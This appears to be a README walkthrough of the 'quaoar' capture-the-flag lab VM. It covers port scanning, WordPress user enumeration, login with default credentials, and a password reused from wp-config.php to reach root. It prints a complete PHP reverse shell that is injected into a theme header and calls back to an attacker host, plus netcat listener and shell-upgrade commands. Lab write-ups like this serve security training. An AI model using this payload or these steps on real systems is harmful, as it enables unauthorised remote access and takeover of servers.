Skip to content

Latest commit

 

History

History

quaoar

Folders and files

NameName
Last commit message
Last commit date

parent directory

..
README
README
 
 
quaoar.nmap
quaoar.nmap
 
 

README

Recon Phase:

IP= 172.16.34.155

$ nmap -p 1-65535 -T4 -A -v 172.16.34.155
    PORT    STATE SERVICE     VERSION
    22/tcp  open  ssh         OpenSSH 5.9p1 Debian 5ubuntu1 (Ubuntu Linux; protocol 2.0)
    | ssh-hostkey:
    |   1024 d0:0a:61:d5:d0:3a:38:c2:67:c3:c3:42:8f:ae:ab:e5 (DSA)
    |   2048 bc:e0:3b:ef:97:99:9a:8b:9e:96:cf:02:cd:f1:5e:dc (RSA)
    |_  256 8c:73:46:83:98:8f:0d:f7:f5:c8:e4:58:68:0f:80:75 (ECDSA)
    53/tcp  open  domain      ISC BIND 9.8.1-P1
    | dns-nsid:
    |_  bind.version: 9.8.1-P1
    80/tcp  open  http        Apache httpd 2.2.22 ((Ubuntu))
    | http-methods:
    |_  Supported Methods: GET HEAD POST OPTIONS
    | http-robots.txt: 1 disallowed entry
    |_Hackers
    |_http-server-header: Apache/2.2.22 (Ubuntu)
    |_http-title: Site doesn't have a title (text/html).
    110/tcp open  pop3?
    139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
    143/tcp open  imap        Dovecot imapd
    445/tcp open  netbios-ssn Samba smbd 3.6.3 (workgroup: WORKGROUP)
    993/tcp open  ssl/imap    Dovecot imapd
    | ssl-cert: Subject: commonName=ubuntu/organizationName=Dovecot mail server
    | Issuer: commonName=ubuntu/organizationName=Dovecot mail server
    | Public Key type: rsa
    | Public Key bits: 2048
    | Signature Algorithm: sha1WithRSAEncryption
    | Not valid before: 2016-10-07T04:32:43
    | Not valid after:  2026-10-07T04:32:43
    | MD5:   e242 d8cb 6557 1624 38af 0867 05e9 2677
    |_SHA-1: b5d0 537d 0850 11d0 e9c0 fb10 ca07 37c3 af10 9382
    995/tcp open  ssl/pop3s?
    | ssl-cert: Subject: commonName=ubuntu/organizationName=Dovecot mail server
    | Issuer: commonName=ubuntu/organizationName=Dovecot mail server
    | Public Key type: rsa
    | Public Key bits: 2048
    | Signature Algorithm: sha1WithRSAEncryption
    | Not valid before: 2016-10-07T04:32:43
    | Not valid after:  2026-10-07T04:32:43
    | MD5:   e242 d8cb 6557 1624 38af 0867 05e9 2677
    |_SHA-1: b5d0 537d 0850 11d0 e9c0 fb10 ca07 37c3 af10 9382

$ dirb http://172.16.34.155
There is a wordpress in http://172.16.34.155/wordpress/

Then i tried to enumerate users and plugins
$ wpscan --url http://172.16.34.155/wordpress --enumerate u
    [+] Enumerating usernames ...
    [+] Identified the following 2 user/s:
        +----+--------+--------+
        | Id | Login  | Name   |
        +----+--------+--------+
        | 1  | admin  | admin  |
        | 2  | wpuser | wpuser |
        +----+--------+--------+
======================================================================
Attacking Phase:

Then i tried to access with the default login username: admin Passowrd: admin
Now i'm admin ,,, Then i navigated to Appearance -- Editor and then edited the header
then added a reverse php shell


      <?php
      set_time_limit (0);
      $VERSION = "1.0";
      $ip = '172.16.34.1';
      $port = 1234;
      $chunk_size = 1400;
      $write_a = null;
      $error_a = null;
      $shell = 'uname -a; w; id; /bin/sh -i';
      $daemon = 0;
      $debug = 0;
      if (function_exists('pcntl_fork')) {
      	$pid = pcntl_fork();
      	if ($pid == -1) {
      		printit("ERROR: Can't fork");
      		exit(1);
      	}
      	if ($pid) {
      		exit(0);  // Parent exits
      	}
      	if (posix_setsid() == -1) {
      		printit("Error: Can't setsid()");
      		exit(1);
      	}
      	$daemon = 1;
      } else {
      	printit("WARNING: Failed to daemonise.  This is quite common and not fatal.");
      }
      chdir("/");
      umask(0);
      $sock = fsockopen($ip, $port, $errno, $errstr, 30);
      if (!$sock) {
      	printit("$errstr ($errno)");
      	exit(1);
      }
      $descriptorspec = array(
         0 => array("pipe", "r"),
         1 => array("pipe", "w"),
         2 => array("pipe", "w")
      );
      $process = proc_open($shell, $descriptorspec, $pipes);
      if (!is_resource($process)) {
      	printit("ERROR: Can't spawn shell");
      	exit(1);
      }
      stream_set_blocking($pipes[0], 0);
      stream_set_blocking($pipes[1], 0);
      stream_set_blocking($pipes[2], 0);
      stream_set_blocking($sock, 0);
      printit("Successfully opened reverse shell to $ip:$port");
      while (1) {
      	if (feof($sock)) {
      		printit("ERROR: Shell connection terminated");
      		break;
      	}
      	if (feof($pipes[1])) {
      		printit("ERROR: Shell process terminated");
      		break;
      	}
      	$read_a = array($sock, $pipes[1], $pipes[2]);
      	$num_changed_sockets = stream_select($read_a, $write_a, $error_a, null);
      	if (in_array($sock, $read_a)) {
      		if ($debug) printit("SOCK READ");
      		$input = fread($sock, $chunk_size);
      		if ($debug) printit("SOCK: $input");
      		fwrite($pipes[0], $input);
      	}
      	if (in_array($pipes[1], $read_a)) {
      		if ($debug) printit("STDOUT READ");
      		$input = fread($pipes[1], $chunk_size);
      		if ($debug) printit("STDOUT: $input");
      		fwrite($sock, $input);
      	}
      	if (in_array($pipes[2], $read_a)) {
      		if ($debug) printit("STDERR READ");
      		$input = fread($pipes[2], $chunk_size);
      		if ($debug) printit("STDERR: $input");
      		fwrite($sock, $input);
      	}
      }
      fclose($sock);
      fclose($pipes[0]);
      fclose($pipes[1]);
      fclose($pipes[2]);
      proc_close($process);
      function printit ($string) {
      	if (!$daemon) {
      		print "$string\n";
      	}
      }
      ?>
From my local machine $ nc -lvp 1234
Then i refreshed index.php then i got a shell on nc
$ id
  uid=33(www-data) gid=33(www-data) groups=33(www-data)
$ python -c 'import pty; pty.spawn("/bin/bash")'
$ cd /home
$ ls
  wpadmin
$ cd wpadmin
$ ls
 flag.txt
cat flag.txt
2bafe61f03117ac66a73c3c514de796e ====> First flag
======================================================================
$ cd /var/www/wordpress
$ cat wp-config.php
    define('DB_NAME', 'wordpress');

    /** MySQL database username */
    define('DB_USER', 'root');

    /** MySQL database password */
    define('DB_PASSWORD', 'rootpassword!');

    /** MySQL hostname */
    define('DB_HOST', 'localhost');
Then i tried to access as a superuser
$ su
$ Password: rootpassword!
$ id
uid=0(root) gid=0(root) groups=0(root)
$ cd /root
$ cat flag.txt
8e3f9ec016e3598c5eec11fd3d73f6fb ===> Second flag
======================================================================
I looked up for the third flag and found it in /etc/cron.d/php5
$ cat /etc/cron.d/php5
    # /etc/cron.d/php5: crontab fragment for php5
    #  This purges session files older than X, where X is defined in seconds
    #  as the largest value of session.gc_maxlifetime from all your php.ini
    #  files, or 24 minutes if not defined.  See /usr/lib/php5/maxlifetime
    # Its always a good idea to check for crontab to learn more about the operating
    system good job you get 50! - d46795f84148fd338603d0d6a9dbf8de
    # Look for and purge old sessions every 30 minutes
    09,39 *     * * *     root   [ -x /usr/lib/php5/maxlifetime ] && [ -d /var/lib/php5 ]
    && find /var/lib/php5/ -depth -mindepth 1 -maxdepth 1 -type f -cmin +$(/usr/lib
    /php5/maxlifetime) ! -execdir fuser -s {} 2>/dev/null \; -delete

d46795f84148fd338603d0d6a9dbf8de ===> Third flag
======================================================================